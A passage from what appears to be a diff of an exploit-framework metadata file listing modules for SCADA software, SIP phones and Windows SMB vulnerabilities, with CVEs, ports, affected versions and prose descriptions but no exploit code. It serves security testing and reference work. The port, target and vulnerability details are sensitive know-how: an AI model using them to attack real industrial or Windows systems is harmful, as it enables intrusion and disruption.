DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4142", - "OSVDB-68812" - ], - "platform": "Windows", - "arch": "", - "rport": 912, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/realwin_scpc_txtevent.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_scpc_txtevent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/rockwell_factorytalk_rce": { - "name": "Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/scada/rockwell_factorytalk_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-06-22", - "type": "exploit", - "author": [ - "Pedro Ribeiro ", - "Radek Domanski " - ], - "description": "This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution\n on the Rockwell FactoryTalk View SE SCADA product as the IIS user.\n The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request,\n the second is a directory traversal, and the third is a race condition. In order to achieve full remote code execution on all\n targets, two information leak vulnerabilities are also abused.\n This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.", - "references": [ - "URL-https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md", - "URL-https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md", - "CVE-2020-12027", - "CVE-2020-12028", - "CVE-2020-12029", - "ZDI-20-727", - "ZDI-20-728", - "ZDI-20-729", - "ZDI-20-730" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Rockwell Automation FactoryTalk SE" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb", - "is_install_path": true, - "ref_name": "windows/scada/rockwell_factorytalk_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/scadapro_cmdexe": { - "name": "Measuresoft ScadaPro Remote Command Execution", - "fullname": "exploit/windows/scada/scadapro_cmdexe", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-09-16", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "mr_me ", - "TecR0c " - ], - "description": "This module allows remote attackers to execute arbitrary commands on the\n affected system by abusing via Directory Traversal attack when using the\n 'xf' command (execute function). An attacker can execute system() from\n msvcrt.dll to upload a backdoor and gain remote code execution. This\n vulnerability affects version 4.0.0 and earlier.", - "references": [ - "CVE-2011-3497", - "OSVDB-75490", - "BID-49613", - "URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt", - "URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf", - "URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": 11234, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/scadapro_cmdexe.rb", - "is_install_path": true, - "ref_name": "windows/scada/scadapro_cmdexe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/sunway_force_control_netdbsrv": { - "name": "Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57", - "fullname": "exploit/windows/scada/sunway_force_control_netdbsrv", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-09-22", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Rinat Ziyayev", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found in the SNMP\n NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is\n triggered when sending an overly long string to the listening service\n on port 2001.", - "references": [ - "OSVDB-75798", - "BID-49747", - "URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 2001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb", - "is_install_path": true, - "ref_name": "windows/scada/sunway_force_control_netdbsrv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/winlog_runtime": { - "name": "Sielco Sistemi Winlog Buffer Overflow", - "fullname": "exploit/windows/scada/winlog_runtime", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-01-13", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a buffer overflow in Sielco\n Sistem Winlog <= 2.07.00. When sending a specially formatted\n packet to the Runtime.exe service, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2011-0517", - "OSVDB-70418", - "URL-http://aluigi.org/adv/winlog_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02" - ], - "platform": "Windows", - "arch": "", - "rport": 46823, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winlog Lite 2.07.00" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/winlog_runtime.rb", - "is_install_path": true, - "ref_name": "windows/scada/winlog_runtime", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/winlog_runtime_2": { - "name": "Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16", - "fullname": "exploit/windows/scada/winlog_runtime_2", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-04", - "type": "exploit", - "author": [ - "Michael Messner " - ], - "description": "This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.\n When sending a specially formatted packet to the Runtime.exe service on port 46824,\n an attacker may be able to execute arbitrary code.", - "references": [ - "BID-53811", - "CVE-2012-3815", - "OSVDB-82654", - "EDB-18986", - "URL-http://www.s3cur1ty.de/m1adv2012-001", - "URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html" - ], - "platform": "Windows", - "arch": "", - "rport": 46824, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project", - "Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/winlog_runtime_2.rb", - "is_install_path": true, - "ref_name": "windows/scada/winlog_runtime_2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkbcopyd_bof": { - "name": "Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkbcopyd_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-10", - "type": "exploit", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.", - "references": [ - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", - "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", - "CVE-2014-0784" - ], - "platform": "Windows", - "arch": "", - "rport": 20111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkbcopyd_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkesimmgr_bof": { - "name": "Yokogawa CS3000 BKESimmgr.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkesimmgr_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-10", - "type": "exploit", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n insecure usage of memcpy, using attacker controlled data as the size count. This module\n has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", - "references": [ - "CVE-2014-0782", - "URL-https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities", - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 34205, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkesimmgr_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkfsim_vhfd": { - "name": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkfsim_vhfd", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-23", - "type": "exploit", - "author": [ - "Redsadic ", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.", - "references": [ - "CVE-2014-3888", - "URL-http://jvn.jp/vu/JVNVU95045914/index.html", - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf", - "URL-https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow" - ], - "platform": "Windows", - "arch": "", - "rport": 20010, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkfsim_vhfd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkhodeq_bof": { - "name": "Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkhodeq_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-03-10", - "type": "exploit", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", - "references": [ - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", - "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", - "CVE-2014-0783" - ], - "platform": "Windows", - "arch": "", - "rport": 20171, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkhodeq_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sip/aim_triton_cseq": { - "name": "AIM Triton 1.0.4 CSeq Buffer Overflow", - "fullname": "exploit/windows/sip/aim_triton_cseq", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in AOL\\'s AIM\n Triton 1.0.4. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", - "references": [ - "CVE-2006-3524", - "OSVDB-27122", - "BID-18906" - ], - "platform": "Windows", - "arch": "", - "rport": 5061, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "AIM Triton 1.0.4 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/sip/aim_triton_cseq.rb", - "is_install_path": true, - "ref_name": "windows/sip/aim_triton_cseq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sip/sipxezphone_cseq": { - "name": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", - "fullname": "exploit/windows/sip/sipxezphone_cseq", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", - "references": [ - "CVE-2006-3524", - "OSVDB-27122", - "BID-18906" - ], - "platform": "Windows", - "arch": "", - "rport": 5060, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "sipXezPhone 0.35a Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/sip/sipxezphone_cseq.rb", - "is_install_path": true, - "ref_name": "windows/sip/sipxezphone_cseq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sip/sipxphone_cseq": { - "name": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", - "fullname": "exploit/windows/sip/sipxphone_cseq", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", - "references": [ - "CVE-2006-3524", - "OSVDB-27122", - "BID-18906" - ], - "platform": "Windows", - "arch": "", - "rport": 5060, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SIPfoundry sipXphone 2.6.0.27 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/sip/sipxphone_cseq.rb", - "is_install_path": true, - "ref_name": "windows/sip/sipxphone_cseq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/cve_2020_0796_smbghost": { - "name": "SMBv3 Compression Buffer Overflow", - "fullname": "exploit/windows/smb/cve_2020_0796_smbghost", - "aliases": [], - "rank": 200, - "disclosure_date": "2020-03-13", - "type": "exploit", - "author": [ - "hugeh0ge", - "chompie1337", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code\n in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. Exploitation\n can take a few minutes as the necessary data is gathered.", - "references": [ - "CVE-2020-0796", - "URL-https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html", - "URL-https://github.com/chompie1337/SMBGhost_RCE_PoC", - "URL-https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s", - "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems", - "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows", - "URL-https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 v1903-1909 x64" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb", - "is_install_path": true, - "ref_name": "windows/smb/cve_2020_0796_smbghost", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "SMBGhost", - "CoronaBlue" - ], - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "RelatedModules": [ - "exploit/windows/local/cve_2020_0796_smbghost" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/generic_smb_dll_injection": { - "name": "Generic DLL Injection From Shared Resource", - "fullname": "exploit/windows/smb/generic_smb_dll_injection", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-03-04", - "type": "exploit", - "author": [ - "Matthew Hall " - ], - "description": "This is a general-purpose module for exploiting conditions where a DLL can be loaded\n from a specified SMB share. This module serves payloads as DLLs over an SMB service.", - "references": [ - "CWE-114" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/generic_smb_dll_injection.rb", - "is_install_path": true, - "ref_name": "windows/smb/generic_smb_dll_injection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/group_policy_startup": { - "name": "Group Policy Script Execution From Shared Resource", - "fullname": "exploit/windows/smb/group_policy_startup", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-01-26", - "type": "exploit", - "author": [ - "Sam Bertram ", - "juan vazquez " - ], - "description": "This is a general-purpose module for exploiting systems with Windows Group Policy\n configured to load VBS startup/logon scripts from remote locations. This module runs\n a SMB shared resource that will provide a payload through a VBS file. Startup scripts\n will be executed with SYSTEM privileges, while logon scripts will be executed with the\n user privileges. Have into account which the attacker still needs to redirect the\n target traffic to the fake SMB share to exploit it successfully. Please note in some\n cases, it will take 5 to 10 minutes to receive a session.", - "references": [ - "URL-http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html", - "URL-https://github.com/GDSSecurity/BadSamba" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/group_policy_startup.rb", - "is_install_path": true, - "ref_name": "windows/smb/group_policy_startup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "badsamba" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ipass_pipe_exec": { - "name": "IPass Control Pipe Remote Command Execution", - "fullname": "exploit/windows/smb/ipass_pipe_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-01-21", - "type": "exploit", - "author": [ - "Matthias Kaiser", - "h0ng10 " - ], - "description": "This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused\n to force the service to load a DLL from a SMB share.", - "references": [ - "CVE-2015-0925", - "OSVDB-117423", - "BID-72265", - "URL-http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows x32", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ipass_pipe_exec.rb", - "is_install_path": true, - "ref_name": "windows/smb/ipass_pipe_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms03_049_netapi": { - "name": "MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow", - "fullname": "exploit/windows/smb/ms03_049_netapi", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-11-11", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n function using the Workstation service in Windows XP.", - "references": [ - "CVE-2003-0812", - "OSVDB-11461", - "BID-9011", - "MSB-MS03-049" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows XP SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms03_049_netapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms03_049_netapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms04_007_killbill": { - "name": "MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow", - "fullname": "exploit/windows/smb/ms04_007_killbill", - "aliases": [], - "rank": 100, - "disclosure_date": "2004-02-10", - "type": "exploit", - "author": [ - "Solar Eclipse " - ], - "description": "This is an exploit for a previously undisclosed\n vulnerability in the bit string decoding code in the\n Microsoft ASN.1 library. This vulnerability is not related\n to the bit string vulnerability described in eEye advisory\n AD20040210-2. Both vulnerabilities were fixed in the\n MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this\n vulnerability.\n\n You are only allowed one attempt with this vulnerability. If\n the payload fails to execute, the LSASS system service will\n crash and the target system will automatically reboot itself\n in 60 seconds. If the payload succeeds, the system will no\n longer be able to process authentication requests, denying\n all attempts to login through SMB or at the console. A\n reboot is required to restore proper functioning of an\n exploited system.\n\n This exploit has been successfully tested with the win32/*/reverse_tcp\n payloads, however a few problems were encountered when using the\n equivalent bind payloads. Your mileage may vary.", - "references": [ - "CVE-2003-0818", - "OSVDB-3902", - "BID-9633", - "MSB-MS04-007" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP2-SP4 + Windows XP SP0-SP1" - ], - "mod_time": "2022-07-10 00:07:26 +0000", - "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms04_007_killbill", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "kill-bill" - ], - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "crash-os-restarts", - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms04_011_lsass": { - "name": "MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow", - "fullname": "exploit/windows/smb/ms04_011_lsass", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-04-13", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the LSASS service, this vulnerability\n was originally found by eEye. When re-exploiting a Windows XP system, you will need\n need to run this module twice. DCERPC request fragmentation can be performed by setting\n 'FragSize' parameter.", - "references": [ - "CVE-2003-0533", - "OSVDB-5248", - "BID-10108", - "MSB-MS04-011" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targetting", - "Windows 2000 English", - "Windows XP English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms04_011_lsass.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms04_011_lsass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms04_031_netdde": { - "name": "MS04-031 Microsoft NetDDE Service Overflow", - "fullname": "exploit/windows/smb/ms04_031_netdde", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-10-12", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack buffer overflow in the NetDDE service, which is the\n precursor to the DCOM interface. This exploit effects only operating systems\n released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim\n that this vulnerability can be exploited without authentication, the NDDEAPI\n pipe is only accessible after successful authentication.", - "references": [ - "CVE-2004-0206", - "OSVDB-10689", - "BID-11372", - "MSB-MS04-031" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms04_031_netdde.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms04_031_netdde", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms05_039_pnp": { - "name": "MS05-039 Microsoft Plug and Play Service Overflow", - "fullname": "exploit/windows/smb/ms05_039_pnp", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-08-09", - "type": "exploit", - "author": [ - "hdm ", - "cazz " - ], - "description": "This module exploits a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account.\n\n NOTE: Since the PnP service runs inside the service.exe process, a failed\n exploit attempt will cause the system to automatically reboot.", - "references": [ - "CVE-2005-1983", - "OSVDB-18605", - "BID-14513", - "MSB-MS05-039" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP0-SP4", - "Windows 2000 SP4 French", - "Windows 2000 SP4 Spanish", - "Windows 2000 SP4 Universal", - "Windows 2000 SP0-SP4 German", - "Windows 2000 SP0-SP4 Italian", - "Windows XP SP1 English", - "Windows XP SP2 English (Requires Admin)", - "Windows Server 2003 SP0 English (Requires Admin)", - "Windows Server 2003 SP1 English (Requires Admin)" - ], - "mod_time": "2021-11-28 13:39:05 +0000", - "path": "/modules/exploits/windows/smb/ms05_039_pnp.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms05_039_pnp", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_025_rasmans_reg": { - "name": "MS06-025 Microsoft RRAS Service RASMAN Registry Overflow", - "fullname": "exploit/windows/smb/ms06_025_rasmans_reg", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-06-13", - "type": "exploit", - "author": [ - "pusscat ", - "hdm " - ], - "description": "This module exploits a registry-based stack buffer overflow in the Windows Routing\n and Remote Access Service. Since the service is hosted inside svchost.exe,\n a failed exploit attempt can cause other system services to fail as well.\n A valid username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n Exploiting this flaw involves two distinct steps - creating the registry key\n and then triggering an overwrite based on a read of this key. Once the key is\n created, it cannot be recreated. This means that for any given system, you\n only get one chance to exploit this flaw. Picking the wrong target will require\n a manual removal of the following registry key before you can try again:\n HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook", - "references": [ - "CVE-2006-2370", - "OSVDB-26437", - "BID-18325", - "MSB-MS06-025" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_025_rasmans_reg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_025_rras": { - "name": "MS06-025 Microsoft RRAS Service Overflow", - "fullname": "exploit/windows/smb/ms06_025_rras", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-06-13", - "type": "exploit", - "author": [ - "Nicolas Pouvesle ", - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the Windows Routing and Remote\n Access Service. Since 